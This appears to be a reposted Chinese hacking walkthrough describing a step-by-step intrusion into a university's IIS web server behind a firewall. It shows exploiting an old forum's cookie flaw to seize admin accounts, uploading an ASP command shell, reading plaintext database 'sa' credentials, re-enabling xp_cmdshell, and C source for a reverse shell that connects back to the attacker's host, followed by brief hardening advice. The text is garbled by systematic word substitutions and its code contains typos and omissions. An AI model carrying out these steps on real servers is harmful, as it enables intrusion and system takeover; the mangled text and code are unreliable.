许多公司或公司将其Web效劳器放在内网，并在防火墙上做映射，将来自80端口的恳求转向一台内网Web效劳器的Web端口。



　　这样做安全性是提高了不少，但并不代表将Web效劳器躲藏在内网就必定安全了，由于Web效劳器自身仍是存在许多疑问的，特别是一些CG，程序，通常这是大家最简单忽略的当地。下面就以一台敞开80端口的Web效劳器为例，来测验其存在的安全隐患疑问，并且对存在疑问做测验描绘，指出疑问的症结所在并给出防备错施。



　　这是某大学的文娱休闲网站，进入看了看，页面做得不错，先看一看是什么Web效劳器吧。



　　D:\ne -vv www.target.com 80



　　DNS fwd/rev mismatch:www.target.com!=traget



　　www.target.com[192.168.0.1]80(http)open



　　GEP/HTTP/1.0



　　HOST:www.target.com



　　HTTP/1.1 200 OK



　　Server:Microsoft-IIS/5.0



　　Content-location:http://www.target.com/index.asp



　　Date:Thu，22 May 2003 12:13:32 GMT



　　Content-Type:text/html



　　......



　　是IIS5.0，看看能不能直接溢出。用最新的IIS的WebDav溢出试试。个人感觉isno写的那个溢出对比好用，但由于它是在内网，这个东西致使溢出后会直接在7788端口绑定一个cmd，这对咱们的这次侵略来说肯定是不可的。所以，我将它修改了一下，使它能够反向衔接，但终究仍是不可，看来对方是打了补丁的。



　　又逛了一下其他版面，看到有个BBS，是动网的论坛并且版别还对比低(5.00320)。不错，这通常是咱们的突破口(榜首大失利)。很早曾经我和我的好友pskey曾发现一个它的cookie变量未过滤缝隙，他还写了一个Exploit(程序放在光盘中)。经过这个缝隙，我能够随意更改恣意用户(包含总版主)的用户暗码。我用这个ID进入，进到后台办理，修改设置，答应上载exe、asp等文件。再看看有没有禁用FSO，成果没有禁用(第二大失利)。我经过它上载了一个aspcmdshell。这个aspcmdshell能够使我以guests组权限的用户在Web效劳器上履行指令，当然，前题是它没有扔掉guests组对%systemroot%\winnt\cdm.exe的拜访履行权限。试试"dir c:\"看看，公然没有制止运转(第三大失利)。其实，假如它制止了cmd.exe的运转权限也不要紧的，咱们能够自已上载一个上去，再改一下这个aspcmdshell就能够了。有了这个aspcmdshell，咱们能够做许多工作。当然这还不够，我的意图是拿到最高权限。此刻我就预备提高权限了。先看一看办理员给了guests组哪些权限，看一下ipconfig的回来成果:



　　Windows 2000 IP Configuration



　　Ethernet adapter本地衔接:



　　Connection-specific DNS Suffix.:



　　IP Address.................: 192.168.1.222



　　Subnet Mask................: 255.255.255.0



　　Default Gateway............: 192.168.1.1



　　哟，在内网，不错，再试试C:\可不可写，答案是不可写(不错)。再试试其他目录，整个C.盘都不可写，只给了Web目录的可写权限。再看一看跑了哪些效劳，用netstat -an指令来检查一下。



　　TCP 127.0.0.1:1433　0.0.0.0:0　LISTENING哟!还跑了MSSQL的，不错。这时分榜首个想做的即是看看哪些程序运用了MSSQL数据库。再到主页上逛逛，看到有一个新闻体系，很有能够即是它。用刚才那个aspcmdshell去检查一下这个news/目录里边的ASP程序，看到许多文件榜首行都有，根本上这个即是数据库的衔接程序了。检查一下:



　　strconn="Driver={SQL erver};Ddescription=sqldemo;



　　SERVER=127.0.0.1;UID=sa;&



　　PWD=hello;DATABASE=news



　　set conn=server.createobject("adodb.connection")



　　conn.open strconn



　　公然不出我所料(第四大失利，将MSSQL的用户名和暗码以明文方式存放在ASP文件里)，拿到了MSSQL数据库的暗码，并且仍是sa用户的，权限对比大哦。本来想看看能不能查找一下新闻体系ASP程序的缝隙，运用一下sql injection的。看来如今彻底没有必要了。自个写一个能够用MSSQL拓展xp一cmdshell来履行体系指令的ASP程序，这里有能够办理员删了这个拓展，或直接删掉了xplog70.dll这个文件。不管它，先试试再说。写sql.asp内容如下:



　　自个先开防火墙，记载icmp数据包，然后在IE里履行:



　　http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=ping%20192.168.0.1



　　这个ASP是经过动网论坛自个的上载程序上载机程序设定把上载文件都上载到up1Oad土mageS/这个目录里边，根据当时时间将文件重命名，所以文件名为439587438739·aSp这样的全数字构成。



　　防火墙没反响，晕!看来是删了Xp--CmdSheI1这个拓展，或直接删掉了Xp1Og70·d11这个文件。假如没有直接删掉Xp1Og70·d11，而仅仅删了这个拓展的话，我来试一下恢复这个拓展。再写个ASP:



　　上载上去，再履行http://www.target.com/bbs/uploadimages/23456489432.asp.



　　然后再提交恳求:



　　http://www.target.com/bbs/uploadimages/



　　439587438739.asp?cmd=ping%192.168.0.1



　　呵呵，咱们的防火墙有反响了。来自www.target.com的icmp数据包被记载。看来没有疑问了，经过这个ASP咱们能够履行许多指令 (第五大失利)，都是system权限，只不过没有回显，不是很完美。所以想得到一个交互式的she1l。写个反连的程序吧:



　　#include



　　#include



　　#pragma comment(lib."ws2_32")



　　void main(int argc，char*argv[])



　　{



　　WSADATA wsaData;



　　SOCKET hSocket;



　　STARTUPINFO si;



　　PROCESS_INFORMATION pi;



　　struct sockaddr_in adik_sin;



　　memset(&adik_sin，0，sizeof(adik_sin));



　　memset(&si，0，sizeof(si));



　　WSAStartuup(MAKEWORD(2，0)，&WSAdATA);



　　hSocket=WSASocket(AF_INET，



　　SOCK_STREMA，NULL，NULL，NULL，NULL);



　　adik_sin.sin_family=AF_INET;



　　adik_sin.sin_port=htons(53);//衔接到我的主机53端口



　　adik_sin.sin_addr.s_addr=inet_addr("192.



　　168.0.1:);//我的主机的IP



　　connect(hSocket.(struct sockaddr*)%adik_sin，



　　sizeof(adik_sin);



　　si.cb=sizeof(si)



　　si.dwFlags-STARTF_USESTDHANDLES;



　　si.hStdlnput=si.hStdOutput=si.hStdError



　　=(void*)hSocket;



　　CreateProcess(NULL."cmd.exe"，NULL，



　　NULL，1，NULL，NULL，NULL，&si.&pi);



　　ExitProcess(0);



　　}



　　编译成a.exe然后上载上去先在本机用nc监听一个端口53，然后在IE里履行:



　　http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=D:\inetpub\wwwroot\bbs\uploadimages\3215645664654.exe



　　D:\nc-1 -p 53



　　Microsoft Windows 2000[Version 5.00.2195]



　　版权所有1985-2000Microsoft Corp:



　　D:\inetpub\wwwroot\bbs\uploadimages>ipconfig



　　windows 2000 IP Configuration



　　Ethernet adapter本地衔接:



　　Connection-specific DNS Suffix.:



　　IP Address..............:192.168.1.222



　　Subnet Mask.............:255.255.255.0



　　Default Gateway.........:192.168.1.1



　　D:\inetpub\wwwroot\bbs\uploadimages>



　　好了，到此为止，侵略根本上完成了，如今咱们现已拿到了一个system权限的交互式shell，咱们能够"随心所欲"了。这个时分咱们能够装一个后门，使得咱们萄次进来不必这么费事，我曾经写了"一个US-BACKDOOR。使咱们能够经过80端口来"得到一个交互式的shell，且不影响，IIS程序自身的。正常运转。这个backdoor能够在我的主页上下载到。　　上面的几大失利使得咱们每避一步人侵都取得了更多的权限，其实一个优异的办理员彻底能够防止这些。所以，一个小小的ASP程序过错都能够使你的效劳器被Cracker损坏。程序员们，该留意一下你们的程序了。对于前面我说到的几大失利，我稍稍总绪一下办理"根本应当做到的当地:



　　(1)、不要运用已知缝隙非常多的ASP程序，特别是像动网对比低的版别这类，即便运用了，也要常常去官方论坛看看对比新的缝隙信息，及时打补丁或晋级程序。



　　(2)、假如没有必要用到FSO，能够禁用。



　　(3)、用cscls%systemroot%\winnt\cmd.exe/e/d guests指令，制止掉GUESTS组用户拜访cmd.exe。



　　(4)、尽量不要将数据库的暗码以明文的方式放在ASP程序里边，能够运用数据源的方式来衔接数据库。



　　(5)、通常用户应当用不到xp_crndshell这个拓展的，那么最佳删掉xplog70.dll;尽量不要用sa这个用户。将sa的暗码设杂乱一些，能够另建一个用户，把权限调到最低。



　　跋文



　　文中所说到的被进犯的网站主并非一台露出在外面的裸机，而是经过防火墙映射的放置在内网的效劳。